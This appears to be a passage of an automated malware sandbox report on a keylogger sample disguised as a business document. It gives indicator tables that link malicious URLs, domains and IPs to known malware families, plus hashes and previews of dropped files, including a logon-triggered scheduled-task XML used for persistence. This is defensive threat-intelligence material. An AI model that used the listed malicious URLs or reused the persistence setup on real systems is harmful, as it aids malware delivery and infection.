                                        • www.coinwab.com/kqqj/
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • joxi.net/4Ak49WQH0GE3Nr.mp3
                                        Rudvfa0Z17.exeGet hashmaliciousNitolBrowse
                                        • web.ad87h92j.com/4/t.bmp
                                        nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                                        • web.ad87h92j.com/4/t.bmp
                                        QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                        • filetransfer.io/data-package/0U9QqTZ6/download
                                        QUOTATION_AUGQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • filetransfer.io/data-package/e0pM9Trc/download
                                        steam_module_x64.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 671893cm.n9shka.top/eternalpipeLowProcessDbDatalifewpPublicCdn.php
                                        http://membership.garenaa.id.vn/css/tunnel.aspx/manager10.jspGet hashmaliciousUnknownBrowse
                                        • membership.garenaa.id.vn/user/login/images/fb_ico.png
                                        193.122.6.168Offer 2024-30496.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        pagamento.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        QUOTATION_AUGQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        RFQ-MR-24-09101 SPS.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        Bukti-Transfer.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        Statement of Account.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        FedEx Shipping Confirmation.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        2024-08-23 Fra. 24-1632 000815 (FACT de B12813622).exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        FACTURA PENDIENTE DE COBRO P24PM0531563.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        Order Al Fari Asia Project - ORMANALGERIE Quote #2374832-doc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        reallyfreegeoip.orgOffer 2024-30496.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.97.3
                                        pagamento.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.97.3
                                        8468281651.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.97.3
                                        STATEMENT Aug 2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.96.3
                                        172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        QUOTATION_AUGQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        RFQ-MR-24-09101 SPS.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        SecuriteInfo.com.W32.MSIL_Kryptik.KTU.gen.Eldorado.3036.13101.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        Spec sheet.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.96.3
                                        df24c9ca-d50b-c720-84ed-638e99f68d75.emlGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.96.3
                                        checkip.dyndns.comOffer 2024-30496.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 193.122.6.168
                                        pagamento.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 193.122.6.168
                                        8468281651.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 132.226.8.169
                                        STATEMENT Aug 2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 132.226.8.169
                                        172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 193.122.130.0
                                        QUOTATION_AUGQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 193.122.6.168
                                        RFQ-MR-24-09101 SPS.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 193.122.6.168
                                        SecuriteInfo.com.W32.MSIL_Kryptik.KTU.gen.Eldorado.3036.13101.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 193.122.130.0
                                        Spec sheet.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 193.122.130.0
                                        df24c9ca-d50b-c720-84ed-638e99f68d75.emlGet hashmaliciousSnake KeyloggerBrowse
                                        • 132.226.8.169
                                        api.telegram.org8468281651.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 149.154.167.220
                                        SecuriteInfo.com.Trojan.Inject5.5513.6456.21079.exeGet hashmaliciousAgentTeslaBrowse
                                        • 149.154.167.220
                                        172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        QUOTATION_AUGQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        RFQ-MR-24-09101 SPS.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        SecuriteInfo.com.W32.MSIL_Kryptik.KTU.gen.Eldorado.3036.13101.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        SecuriteInfo.com.W64.ABRisk.KSAB-7665.26815.23633.exeGet hashmaliciousBlank GrabberBrowse
                                        • 149.154.167.220
                                        1C24TDH_00017388.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                        • 149.154.167.220
                                        df24c9ca-d50b-c720-84ed-638e99f68d75.emlGet hashmaliciousSnake KeyloggerBrowse
                                        • 149.154.167.220
                                        18__ e_t___s#U00b5__ 2,6_ G___F____ _._.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ORACLE-BMC-31898USOffer 2024-30496.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 193.122.6.168
                                        pagamento.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 193.122.6.168
                                        172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 193.122.130.0
                                        QUOTATION_AUGQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 193.122.6.168
                                        RFQ-MR-24-09101 SPS.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 193.122.6.168
                                        SecuriteInfo.com.W32.MSIL_Kryptik.KTU.gen.Eldorado.3036.13101.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 193.122.130.0
                                        Spec sheet.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 193.122.130.0
                                        https://ca.docusign.net/Signing/EmailStart.aspx?a=f73cd823-d46e-4c1d-9aa7-a3313bd2d402&etti=24&acct=9d2cdf2a-d1fa-4c66-83f5-9dd312af890e&er=68a0e22a-40d9-446a-8837-385c38bcc4d8Get hashmaliciousUnknownBrowse
                                        • 192.29.14.118
                                        18__ e_t___s#U00b5__ 2,6_ G___F____ _._.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 193.122.130.0
                                        DETAILING_INFO_0321.vbeGet hashmaliciousSnake KeyloggerBrowse
                                        • 193.122.130.0
                                        TELEGRAMRU8468281651.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 149.154.167.220
                                        SecuriteInfo.com.Trojan.Inject5.5513.6456.21079.exeGet hashmaliciousAgentTeslaBrowse
                                        • 149.154.167.220
                                        172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        QUOTATION_AUGQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        RFQ-MR-24-09101 SPS.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        SecuriteInfo.com.W32.MSIL_Kryptik.KTU.gen.Eldorado.3036.13101.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                        • 149.154.167.99
                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                        • 149.154.167.99
                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                        • 149.154.167.99
                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                        • 149.154.167.99
                                        CLOUDFLARENETUSCurriculum Vitae.exeGet hashmaliciousFormBookBrowse
                                        • 188.114.96.3
                                        Fordybendes.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                        • 188.114.96.3
                                        G_24370-24396_SI2_S25_8658_MPO_SMARTEX_240715.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                        • 172.67.74.152
                                        Offer 2024-30496.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.97.3
                                        pagamento.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.97.3
                                        Po#70831.exeGet hashmaliciousAzorultBrowse
                                        • 172.67.128.117
                                        payment PAGO 2974749647839452.jsGet hashmaliciousUnknownBrowse
                                        • 162.159.130.233
                                        Document_pdf.exeGet hashmaliciousFormBookBrowse
                                        • 104.21.62.58
                                        file.exeGet hashmaliciousUnknownBrowse
                                        • 172.64.41.3
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        54328bd36c14bd82ddaa0c04b25ed9adOffer 2024-30496.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.97.3
                                        pagamento.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.97.3
                                        8468281651.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.97.3
                                        STATEMENT Aug 2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.97.3
                                        172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        QUOTATION_AUGQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        RFQ-MR-24-09101 SPS.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        SecuriteInfo.com.W32.MSIL_Kryptik.KTU.gen.Eldorado.3036.13101.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        Spec sheet.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.97.3
                                        cY-5134-kfF.exeGet hashmaliciousUnknownBrowse
                                        • 188.114.97.3
                                        3b5074b1b5d032e5620f69f9f700ff0eG_24370-24396_SI2_S25_8658_MPO_SMARTEX_240715.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                        • 149.154.167.220
                                        payment PAGO 2974749647839452.jsGet hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        Great Wall Motor Sale Bank_Sift_Copy.Pdf.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                        • 149.154.167.220
                                        https://paquete.centrodelvaquero.com/Get hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        QUOTATION_AUGQTRA071244#U00b7PDF.scrGet hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        QUOTATION_AUGQTRA071244#U00b7PDF.scrGet hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        8468281651.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 149.154.167.220
                                        file.exeGet hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        input.htmGet hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        No context
                                        Process:C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.34331486778365
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                        Process:C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.34331486778365
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):2232
                                        Entropy (8bit):5.380805901110357
                                        Encrypted:false
                                        SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:lGLHxvCsIfA2KRHmOugw1s
                                        MD5:2841736A1E367C6D039C41512DA2893E
                                        SHA1:8AE1356D954F14390DD115EB92E2B01F86E98141
                                        SHA-256:70D4743FAB5C407020B872595615D3B018AC17A6F504084BF1E95B061C97047E
                                        SHA-512:E11A1F186A9B75658F905B7128526E054CEE572A4F55BBB864B5E8B5DC3D8B62D1E160F31472213DB0CEB8A612D71B23DAE03EBC6AB5BC0D8933732F2007EF6C
                                        Malicious:false
                                        Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        File Type:XML 1.0 document, ASCII text
                                        Category:dropped
                                        Size (bytes):1572
                                        Entropy (8bit):5.116157947312451
                                        Encrypted:false
                                        SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTCv:He7XQBBYrFdOFzOz6dKrsuk
                                        MD5:B09A6D8A7C22A3EE3A5D1D75172BD035
                                        SHA1:FC476E7AB2138BB0B2F9EFF20532817D50E7736C
                                        SHA-256:87F429225CF6D533697E5C11482795E5C4D42F61B0675B4B65544FB21D67EFF2
                                        SHA-512:668C97AB751FCB76199FC5AA48720295A70287772C3CA7E83606253A9D2E4DD9E8EAB74EC27227F3C1E39145B1536976FA457AD463F67C1498A9466800FA1B54
                                        Malicious:true
                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                                        Process:C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        File Type:XML 1.0 document, ASCII text
                                        Category:dropped
                                        Size (bytes):1572
                                        Entropy (8bit):5.116157947312451
                                        Encrypted:false
                                        SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTCv:He7XQBBYrFdOFzOz6dKrsuk
                                        MD5:B09A6D8A7C22A3EE3A5D1D75172BD035
                                        SHA1:FC476E7AB2138BB0B2F9EFF20532817D50E7736C
                                        SHA-256:87F429225CF6D533697E5C11482795E5C4D42F61B0675B4B65544FB21D67EFF2
                                        SHA-512:668C97AB751FCB76199FC5AA48720295A70287772C3CA7E83606253A9D2E4DD9E8EAB74EC27227F3C1E39145B1536976FA457AD463F67C1498A9466800FA1B54
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                                        Process:C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):792576
                                        Entropy (8bit):7.917312194082446
                                        Encrypted:false
                                        SSDEEP:24576:YbioMtmDUIKVQ2UNdpZRRMDdK/1Apztv:YMt+F2Q/jCMoztv
                                        MD5:B2FCDE172F7605E8A4AF7B60349418D7
                                        SHA1:7279C465E2EA6CED62C742C679DB21EC9A9A4514
                                        SHA-256:8FCC14A7D1F657FD1CF84282AD1D81404E7CCC253E9AD8F36CCD9118A674D6CC
                                        SHA-512:8B40661958D8D0FCD170B3D61492A8FC3FBBAEFADEB2296D42500CF24935CCE6E44575293E2210DECFF4CCD5212821270DC3DFE788F4C8BDEBF36FADBCE0A0E5
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 58%
                                        • Antivirus: Virustotal, Detection: 61%, Browse
